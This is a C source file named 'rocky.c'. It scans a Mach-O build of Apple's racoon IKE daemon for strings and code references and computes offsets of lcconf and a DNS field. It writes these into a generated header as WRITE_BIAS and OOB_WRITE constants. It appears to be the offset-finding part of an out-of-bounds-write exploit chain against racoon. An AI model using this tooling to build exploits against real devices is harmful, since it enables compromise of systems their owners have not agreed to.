rocky.c
#include <assert.h>
#include <err.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach-o/loader.h>
#include "patchfinder64.c"
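/*
 * Recover the value emitted as WRITE_BIAS (see really()).
 *
 * p/sz: the mapped image and its length. Returns the non-zero value
 * computed by calc64(); aborts the process with a diagnostic if any
 * lookup fails, since a missing anchor means the image is not one this
 * tool understands.
 */
static addr_t
offsetof__struct_localconf__retry_counter(const uint8_t *p, off_t sz)
{
    /* Anchor string: the function that logs it is the one we walk. */
    static const char marker[] = "Adding NON-ESP marker\n";
    addr_t ref, bof, call, val;

    /*
     * Each lookup is a hard requirement, so failures are reported with
     * errx() rather than assert(): assert() vanishes under -DNDEBUG and
     * a zero result would then flow silently into the generated header.
     */
    uint8_t *q = boyermoore_horspool_memmem(p, sz, (uint8_t *)marker, sizeof(marker) - 1);
    if (!q) {
        errx(1, "retry_counter: marker string not found");
    }
    /* Code location that references the string. */
    ref = xref64(p, 0, q - p, q - p);
    if (!ref) {
        errx(1, "retry_counter: no reference to marker string");
    }
    /* Presumably the beginning of the enclosing function (see patchfinder64.c). */
    bof = bof64(p, 0, ref);
    if (!bof) {
        errx(1, "retry_counter: cannot find function start");
    }
    /* A call within [bof, ref). */
    call = find_call64(p, bof, ref - bof);
    if (!call) {
        errx(1, "retry_counter: no call before the reference");
    }
    /* The last argument selects which value calc64() recovers — confirm in patchfinder64.c. */
    val = calc64(p, bof, call, 8);
    if (!val) {
        errx(1, "retry_counter: cannot compute value");
    }
    return val;
}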
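/*
 * Recover the address used as the lcconf operand of OOB_WRITE (see really()).
 *
 * Same walk as offsetof__struct_localconf__retry_counter(), differing only
 * in the final calc64() selector. p/sz: the mapped image and its length.
 * Returns a non-zero value; aborts the process with a diagnostic if any
 * lookup fails.
 */
static addr_t
addressof__lcconf(const uint8_t *p, off_t sz)
{
    /* Anchor string: the function that logs it is the one we walk. */
    static const char marker[] = "Adding NON-ESP marker\n";
    addr_t ref, bof, call, val;

    /*
     * Explicit checks instead of assert(): the guards must survive
     * -DNDEBUG, otherwise a zero result silently reaches the output file.
     */
    uint8_t *q = boyermoore_horspool_memmem(p, sz, (uint8_t *)marker, sizeof(marker) - 1);
    if (!q) {
        errx(1, "lcconf: marker string not found");
    }
    /* Code location that references the string. */
    ref = xref64(p, 0, q - p, q - p);
    if (!ref) {
        errx(1, "lcconf: no reference to marker string");
    }
    /* Presumably the beginning of the enclosing function (see patchfinder64.c). */
    bof = bof64(p, 0, ref);
    if (!bof) {
        errx(1, "lcconf: cannot find function start");
    }
    /* A call within [bof, ref). */
    call = find_call64(p, bof, ref - bof);
    if (!call) {
        errx(1, "lcconf: no call before the reference");
    }
    /* The last argument selects which value calc64() recovers — confirm in patchfinder64.c. */
    val = calc64(p, bof, call, 26);
    if (!val) {
        errx(1, "lcconf: cannot compute value");
    }
    return val;
}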
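/*
 * Recover the address used as the dns4 operand of OOB_WRITE (see really()).
 *
 * p/sz: the mapped image and its length. Returns the calc64() result minus
 * a fixed adjustment; aborts the process with a diagnostic if any lookup
 * fails or the scan window would start before the image.
 */
static addr_t
addressof__isakmp_cfg_config__dns4(const uint8_t *p, off_t sz)
{
    /* Anchor string: the code that emits this error is where we look. */
    static const char marker[] = "bad IPv4 DNS address.";
    /* WINDOW: bytes scanned before the reference; ADJUST: subtracted from the result. */
    enum { WINDOW = 64, ADJUST = 12 };
    addr_t ref, val;

    /* Explicit checks instead of assert() so the guards survive -DNDEBUG. */
    uint8_t *q = boyermoore_horspool_memmem(p, sz, (uint8_t *)marker, sizeof(marker) - 1);
    if (!q) {
        errx(1, "dns4: marker string not found");
    }
    /* Code location that references the string. */
    ref = xref64(p, 0, q - p, q - p);
    if (!ref) {
        errx(1, "dns4: no reference to marker string");
    }
    /* ref - WINDOW must not wrap below the start of the image. */
    if (ref < WINDOW) {
        errx(1, "dns4: reference too close to start of image");
    }
    /* The last argument selects which value calc64() recovers — confirm in patchfinder64.c. */
    val = calc64(p, ref - WINDOW, ref, 10);
    if (!val) {
        errx(1, "dns4: cannot compute value");
    }
    return val - ADJUST;
}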
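/*
 * Compute the two constants and write them as a C header.
 *
 * p/sz: the mapped image and its length. output: path of the header to
 * create, or NULL to write to stdout. Returns 0 on success and -1 when
 * the output file cannot be created or flushed; the lookups themselves
 * abort the process on failure (see the addressof__/offsetof__ helpers).
 */
static int
really(const uint8_t *p, off_t sz, const char *output)
{
    addr_t bias = offsetof__struct_localconf__retry_counter(p, sz);
    long lcconf = addressof__lcconf(p, sz);
    long dns4 = addressof__isakmp_cfg_config__dns4(p, sz);
    /* The / 4 converts the byte distance to the unit the consumer of OOB_WRITE expects — confirm there. */
    long distance = (lcconf - dns4) / 4;
    FILE *f = stdout;

    if (output) {
        f = fopen(output, "wt");
        /* Previously unchecked: fprintf() on a NULL stream would crash. */
        if (!f) {
            fprintf(stderr, "error: cannot create %s\n", output);
            return -1;
        }
    }
    fprintf(f, "// automatically generated by rocky. do not edit\n");
    /* addr_t's width is defined in patchfinder64.c; the cast keeps %llx correct on every platform. */
    fprintf(f, "#define WRITE_BIAS 0x%llx\n", (unsigned long long)bias);
    fprintf(f, "#define OOB_WRITE %ld\n", distance);
    if (output) {
        /* fclose() performs the final flush; a failure here means a truncated header. */
        if (fclose(f) != 0) {
            fprintf(stderr, "error: cannot write %s\n", output);
            return -1;
        }
    }
    return 0;
}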
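/*
 * Map the image at filename read-only and hand it to really().
 *
 * output is passed through to really() (NULL means stdout). Returns 0 on
 * success, -1 after printing a diagnostic to stderr on any failure. All
 * resources are released on every path.
 */
static int
do_the_racoon(const char *filename, const char *output)
{
    int fd = open(filename, O_RDONLY);
    if (fd < 0) {
        fprintf(stderr, "error: cannot open %s\n", filename);
        return -1;
    }

    off_t sz = lseek(fd, 0, SEEK_END);
    /* lseek() returns -1 on error; an empty file is equally unusable, and neither may reach mmap(). */
    if (sz <= 0) {
        close(fd);
        fprintf(stderr, "error: cannot determine size of %s\n", filename);
        return -1;
    }

    uint8_t *p = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0);
    if (p == MAP_FAILED) {
        close(fd);
        fprintf(stderr, "error: cannot map %s\n", filename);
        return -1;
    }

    /*
     * Explicit check instead of assert(): this guard must survive -DNDEBUG,
     * because every patchfinder routine downstream trusts the header that
     * MACHO() (patchfinder64.c) presumably inspects.
     */
    if (!MACHO(p)) {
        munmap(p, sz);
        close(fd);
        fprintf(stderr, "error: %s is not a Mach-O image\n", filename);
        return -1;
    }

    int rv = really(p, sz, output);
    munmap(p, sz);
    close(fd);
    if (rv != 0) {
        fprintf(stderr, "error: cannot parse %s\n", filename);
        return -1;
    }
    return 0;
}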
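/*
 * Entry point: rocky <racoon image> [output header].
 *
 * Exits 1 on usage error; otherwise returns do_the_racoon()'s result.
 */
int
main(int argc, char **argv)
{
    /* argv[0] may be NULL when argc == 0 (C11 5.1.2.2.1); never print it unguarded. */
    const char *prog = (argc > 0 && argv[0]) ? argv[0] : "rocky";

    if (argc < 2) {
        printf("usage: %s racoon [output]\n", prog);
        return 1;
    }
    /* argv[argc] is NULL, so without an output argument argv[2] selects stdout in really(). */
    return do_the_racoon(argv[1], argv[2]);
}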